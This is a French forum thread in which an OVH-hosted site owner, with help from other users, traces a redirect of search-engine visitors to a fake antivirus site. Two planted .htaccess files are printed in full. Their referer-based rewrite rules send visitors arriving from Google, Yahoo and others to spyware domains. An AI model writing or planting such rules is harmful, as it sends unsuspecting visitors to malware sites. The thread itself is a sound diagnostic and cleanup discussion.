Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1902 connectés 

 



Dernière réponse
Sujet : Google renvoie mon site vers un antivirus chinois ! (pb résolu)
toum_toum Oui je sais pour Firefox (Ordi/système de ma copine :o )
 
 
Mots de passe : juste 8 (c'est le maxi possible chez OVH)

Votre réponse
Nom d'utilisateur    Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !
Le ton de votre message                        
                       
Votre réponse


[b][i][u][strike][spoiler][fixed][cpp][url][email][img][*]   
 
   [quote]
 

Options

 
Vous avez perdu votre mot de passe ?


Vue Rapide de la discussion
toum_toum Oui je sais pour Firefox (Ordi/système de ma copine :o )
 
 
Mots de passe : juste 8 (c'est le maxi possible chez OVH)
le pote Ton site redirigé affichait ça sous Firefox, je sais pas si t'avais remarqué:
http://hfr-rehost.net/http://self/ [...] 0a8338.png
 
Bonjour le déficit d'image...  [:polionamen]  
 
Sinon t'as mis des mots de passe costauds hein (8 caractères mini, aléatoires, de type Dgo4bXpL, n'est-ce pas ?
aideinfo Il est possible qu'ils aient découvert ce problème sur tes identifiants en consultant les logs Apache.
 
A mon avis, ils n'ont pas de dossier client. C'est un support, non une hotline. Le .htaccess était peut-être déjà là, mais pas avec ces directives ! Probablement vide ou là pour interdire le listage des dossiers, des choses comme ça.
toum_toum

Ruliane a écrit :


Tant mieux si ça marche c'est une bonne nouvelle. Par contre je ne suis pas sûr de comprendre la provenance de ces fichiers : quand tu a souscrit chez OVH, ces fichiers étaient déjà présent sur le FTP ? C'est pas normal. Tu peux toujours leur en parler mais tu obtiendras une réponse évasive de plus.
Si tu peux consulter les logs d'accès tu peux regarder l'utilisation qui est faite de tes scripts, à tout hasard.
Je n'avais jamais vu ça avant en tout cas.


 
Je ne suis pas 100% affirmatif.  Ce que je sais, c'est que lorsque j'ai consulté la première fois mon accès ftp, il y avait qq fichiers, et 1 ou 2 rep.  Je pense que ce .htaccess. était bien présent en effet.
 
J'ai aussi téléchargé joomla, pour tester une mini-boutique... Possible que ce soit de là que ce .htaccess. soit aussi venu. J'avoue que je n'en sais rien...
 
Mais ce qui est sûr, c'est qu'en juin dernier OVH m'a contacté pour un truc plus que douteux.
Leur message le voici :
 

Citation :

Bonjour,
 
Nous vous contactons car vos identifiants/mot de passe ont été
retrouvés sur l'Internet.
 
Ces informations ont été dérobées durant le mois de Juin 2009.
Les identifiants semblent avoir été collectés par une variante de ver Zbot.
Nous vous conseillons de prendre les mesures de nettoyage nécessaires
sur votre machine.
 
1 - désactiver ou supprimer les comptes inutilisés ;
2 - modifier les mots de passe des comptes compromis (en choisissant un
mot de passe dit fort) et si possible des autres ;
3 - vérifier l'intégrité des données présentes sur les serveurs et les
postes de travail ;
4 - consulter les journaux des connexions pour mettre en évidence une
éventuelle exploitation des comptes compromis.
 
 
Merci de me repondre pour confirmer la reception du mail, et de me
repondre de nouveaux lorsque les clients ont été recontactés.
 
 
Cordialement, M


 
J'avoue que je ne m'étais occupé que du 1 et du 2... (Mon mea culpa ici :o )
 
Je leur avais répondu :

Citation :

Bonjour.
 
Message bien reçu.
Pouvez-vous m'indiquer quel est le compte qui a été piraté ? (car j'ai reçu votre message 2 fois, concernant 2 comptes différents).
 
Est-il possible de savoir où se trouvent ces identifiants/passe retrouvés sur le net ?


 
 
Eux :

Citation :

Bonjour,
 
Malheureusement nous n'avons pas cette informations, essayez une recherche via un moteur de recherche.   ( [:cupra] )
Merci.
 
Cordialement s


 
-> Ils ont retrouvé mes identifiants/mot de passe sur Internet mais n'ont pas l'information de savoir où ils les ont trouvés.
+ "via un moteur de recherche"...  [:pacman2002]  
 
 
Mais le pompon c'est le fait qu'ils n'aient pas été capables de faire le lien entre cet échange (que je leur ai renvoyé d'ailleurs), et le problème de piratage dont on parle depuis le début. Alors que ça semble vraiment assez évident il me semble...

Ruliane

aideinfo a écrit :


Oui, je sais, j'suis un bon  :D (quoi mes chevilles ?)

C'est moi qui n'ai pas été très malin sur ce coup-là. :pfff:  

Ruliane

toum_toum a écrit :

Au fait, encore une preuve du "sérieux" du SAV OVH : Je leur ai dit il y a 2 jours que j'avais vidé le site. Du coup ils m'ont répondu que le site étant vidé et le probleme demeurant, c'est bien une preuve qu'ils ne sont pas responsables du problème...
 
Or le site est plein de fichiers de toutes sortes en fait...
 
Bref ils n'y ont jamais jeté le moindre petit coup d'oeil... :)  
 
 
Et l'ai-je déjà dit ? En juin ils m'avaient demandé de changer mes identifiants (ce que j'ai fait), car selon eux j'avais été "visité" (par je ne sais qui, je n'ai jamais eu d'autres explications malgré mes demandes...).
Joli...

Pourtant à leur place j'aurais pas trop envie que l'affaire s'ébruite, je résoudrais ça au plus vite.
 

toum_toum a écrit :


Le "courant" est rétabli !  [:cerveau charlest]  
 
 
 
 
PS au post du dessus : pas faux. Mais il me semble que ces fichiers étaient présents lors de l'achat de mon espace chez OVH.  J'avais été "piraté" en juin dernier et ils me l'avaient signalé, en me demandant de changer mes paramètres, rien de plus. Par contre il n'ont rien vérifié quand aux fichiers sur mon espace. Je pense que c'est là que tout s'est passé...
 
(PS : ils ont été très nuls sur cette histoire. Dans 1 an - délai de mes hébergements, je migre tout le monde
chez un voisin... :o )
 
 
 
Je vous remercie tous pour votre coup de main, j'y serais encore dans 15 jours sans vous...
 
 :jap:


Tant mieux si ça marche c'est une bonne nouvelle. Par contre je ne suis pas sûr de comprendre la provenance de ces fichiers : quand tu a souscrit chez OVH, ces fichiers étaient déjà présent sur le FTP ? C'est pas normal. Tu peux toujours leur en parler mais tu obtiendras une réponse évasive de plus.
Si tu peux consulter les logs d'accès tu peux regarder l'utilisation qui est faite de tes scripts, à tout hasard.
Je n'avais jamais vu ça avant en tout cas.

toum_toum Oui mais justement ce n'est pas par l'infiltration de ces fichiers que le piratage a été fait (car vraiment il me semble qu'ils étaient présents dès le départ - je peux me tromper, mais...) ?
aideinfo Le mieux est de protéger ton espace (notamment tes .php) par des .htaccess.
toum_toum
Le "courant" est rétabli !  [:cerveau charlest]  
 
 
 
 
PS au post du dessus : pas faux. Mais il me semble que ces fichiers étaient présents lors de l'achat de mon espace chez OVH.  J'avais été "piraté" en juin dernier et ils me l'avaient signalé, en me demandant de changer mes paramètres, rien de plus. Par contre il n'ont rien vérifié quand aux fichiers sur mon espace. Je pense que c'est là que tout s'est passé...
 
(PS : ils ont été très nuls sur cette histoire. Dans 1 an - délai de mes hébergements, je migre tout le monde
chez un voisin... :o )
 
 
 
Je vous remercie tous pour votre coup de main, j'y serais encore dans 15 jours sans vous...
 
 :jap:
Misssardonik Mais après faudra trouver comment c'est arrivé, sinon dans 2 jours ça se représentera...
toum_toum Ok chef  :jap:
aideinfo Tu supprimes les 2 .htaccess.
toum_toum Il est donc bien là.. le pirate...   ;)
 
 
Je dois en faire quoi ? Le supprimer, ou le vider ? Ou autre.. ?
toum_toum Les résultats :
 
 
htacess de cgi-bin :
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://www.spyware-systems.info/0/go.php?sid=2 [R,L]
 
 
.htaccess (racine)
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://spywarehome.info/0/go.php?sid=2 [R,L]
 
 
 
.forward (racine)
 
postmaster@monsite.fr
 
 
 
aideinfo Tu rapatrie le .htaccess et le .forward sur ton disque par FTP et tu les ouvres par un éditeur texte.
Regarde aussi le .htaccess de cgi-bin. Il sert sans doute à protéger le contenu, mais on ne sait jamais. Les 3 autres fichiers servent au FTP et sont générés automatiquement :  
.bash_logout  
.bash_profile  
.bashrc  
 

Ruliane a écrit :


 :ouch: Pas con le coup du htaccess j'y avais pas pensé !


 
Oui, je sais, j'suis un bon  :D (quoi mes chevilles ?)

toum_toum Au fait, encore une preuve du "sérieux" du SAV OVH : Je leur ai dit il y a 2 jours que j'avais vidé le site. Du coup ils m'ont répondu que le site étant vidé et le probleme demeurant, c'est bien une preuve qu'ils ne sont pas responsables du problème...
 
Or le site est plein de fichiers de toutes sortes en fait...
 
Bref ils n'y ont jamais jeté le moindre petit coup d'oeil... :)  
 
 
Et l'ai-je déjà dit ? En juin ils m'avaient demandé de changer mes identifiants (ce que j'ai fait), car selon eux j'avais été "visité" (par je ne sais qui, je n'ai jamais eu d'autres explications malgré mes demandes...).
Joli...
toum_toum Le .htaccess, je dois faire comment pour voir ce qu'il y a dedans ?
Ruliane

toum_toum a écrit :


 
 
 
OVH c'est rapé ils ont lâché l'affaire, depuis presque le début.
 
Oui j'ai bien envie de tout déménager, mais probleme : j'ai acheté mes noms de domaine chez eux...
 
D'après vous je peux encore tout remballer ? (j'aurais du rester chez gandi pour les noms de domaine, mais quel c... ! [:jsuistropcon] )
 

Ils l'ont jamais prise au sérieux l'affaire. Pourtant, c'est bien là le problème. Tu peux aller chez un autre hébergeur normalement, il faut juste transférer le nom de domaine.
De réputation, Gandi est bien. Moi je suis chez Bookmyname, jamais eu de soucis non plus.
 

toum_toum a écrit :


Page mise en ligne.

Même comportement qu'avec le site.
 

aideinfo a écrit :

Tu as essayé de faire pointer le domaine vers un sous-dossier au cas où ?  
Affiches-tu bien les fichiers cachés ? Il est possible que ce soit dû à un .htaccess situé à la racine !


 :ouch: Pas con le coup du htaccess j'y avais pas pensé !

toum_toum Donc : je croyais avoir fait le vide, mais me suis trompé. J'étais dans le rep www/ et non
à la racine. Bilan : j'ai un max de trucs sur le site. Voilà le listing complet :
 
 
 
- un répertoire cgi-bin (avec un fichier .htaccess dedans)
- 4 dossiers liés à mes 4 sous-domaines
- un répertoire index_htm_files  <- ca c'est lié à la créa de mon site. Répertoire "à part".
- un répertoire requetes
- un répertoire www (dont je viens de parler, celui qui recoit ma page index.html + le fichier robots que j'avais créé il y a 2 j)
 
- Une série de fichiers "libres" qui sont :
.bash_logout
.bash_profile
.bashrc
.forward
.htaccess
 
+ un fichier LISEZ-MOI
+ enfin la petite dizaine de fichiers de mon site que j'avais dû déjà mettre en ligne ici, par erreur...
 
 
 
* En vert ce sont des fichiers ou rep que j'ai mis moi-même. Tous les autres me sont étrangers.
toum_toum Oui tu as raison je suis en www/ en distant (car plusieurs noms de domaine regroupés sur 1 seul hébergement).
Je vérifie ça...
aideinfo Tu as essayé de faire pointer le domaine vers un sous-dossier au cas où ?  
Affiches-tu bien les fichiers cachés ? Il est possible que ce soit dû à un .htaccess situé à la racine !
toum_toum Oui j'ai créé une page index.html , que j'ai mise en ligne
aideinfo Tu as placé la page que je t'ai demandée ? J'ai besoin de voir quelque chose.
Tu peux le transférer chez Gandi si tu veux, mais tu perds l'hébergement.
toum_toum

aideinfo a écrit :

Mets une page index.html ne contenant que le mot test.


Page mise en ligne.
 
 
(PS : s'il y en a qui veulent l'url, me contacter en privé)

toum_toum

le pote a écrit :

C'est une histoire de fous !
T'aurais pas plus vite fait de changer d'hébergeur ?


 

Ruliane a écrit :

Peut-être, mais ce n'est pas vraiment la question. Pour le principe, ce serait bien qu'OVH s'occupe un peu de son hébergement.


 
OVH c'est rapé ils ont lâché l'affaire, depuis presque le début.
 
Oui j'ai bien envie de tout déménager, mais probleme : j'ai acheté mes noms de domaine chez eux...
 
D'après vous je peux encore tout remballer ? (j'aurais du rester chez gandi pour les noms de domaine, mais quel c... ! [:jsuistropcon] )
 

toum_toum
2 jours après toujours mon site plombé (google ou yahoo).
 
 
Tout cette @@@@@ traine depuis 2 mois et j'ai mon activité qui doit reprendre dans 5 jours.
 
 
Je ne sais pas qui je vais étriper en premier...
Ruliane Peut-être, mais ce n'est pas vraiment la question. Pour le principe, ce serait bien qu'OVH s'occupe un peu de son hébergement.
le pote C'est une histoire de fous !
T'aurais pas plus vite fait de changer d'hébergeur ?
aideinfo Mets une page index.html ne contenant que le mot test.
Ruliane

Misssardonik a écrit :

Le referer, c'est un paramètre qui est contenu dans une requête HTTP (requête que tu fais quand tu demandes une page, quoi), et qui indique de quel site vient l'utilisateur.
Normalement, si l'utilisateur a rentré l'adresse du site directement dans son navigateur, le referer est vide, s'il a cliqué sur un lien suite à une recherche google ce sera google, etc.
 
Cela n'a donc en réalité rien à voir avec google ou yahoo : c'est une information que l'utilisateur envoit au site qu'il visite.
Un utilisateur expérimenté peut donc bricoler des requêtes HTTP en mettant systématiquement google en referer par exemple, même s'il ne vient pas réellement de google. C'est ce que nous faisons avec ton site, et apparement quand on fait celà on est redirigé. Etant donné que ton site est vide ce n'est pas lui qui fait la redirection, c'est donc chez OVH que cette dernière est faite.


Pas mieux [:fading]

Misssardonik Le referer, c'est un paramètre qui est contenu dans une requête HTTP (requête que tu fais quand tu demandes une page, quoi), et qui indique de quel site vient l'utilisateur.
Normalement, si l'utilisateur a rentré l'adresse du site directement dans son navigateur, le referer est vide, s'il a cliqué sur un lien suite à une recherche google ce sera google, etc.

 

Cela n'a donc en réalité rien à voir avec google ou yahoo : c'est une information que l'utilisateur envoit au site qu'il visite.
Un utilisateur expérimenté peut donc bricoler des requêtes HTTP en mettant systématiquement google en referer par exemple, même s'il ne vient pas réellement de google. C'est ce que nous faisons avec ton site, et apparement quand on fait celà on est redirigé. Etant donné que ton site est vide ce n'est pas lui qui fait la redirection, c'est donc chez OVH que cette dernière est faite.

toum_toum
Bon, voilà ce que je viens de faire :
 
 
 
1. J'ai créé un petit fichier sous word (au format txt) intitulé robots.txt
Avec ça comme infos :
 
User-agent: *
Disallow: /
 
2. J'ai mis le fichier en ligne, à la racine du site
 
3. J'attends 3-4 j, et je remets en ligne le site en entier.
 
 
Qu'en pensez-vous ?  
 
 
Mes sources :
http://www.google.com/support/webm [...] wer=156412
http://www.google.com/support/webm [...] wer=156449
 

Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR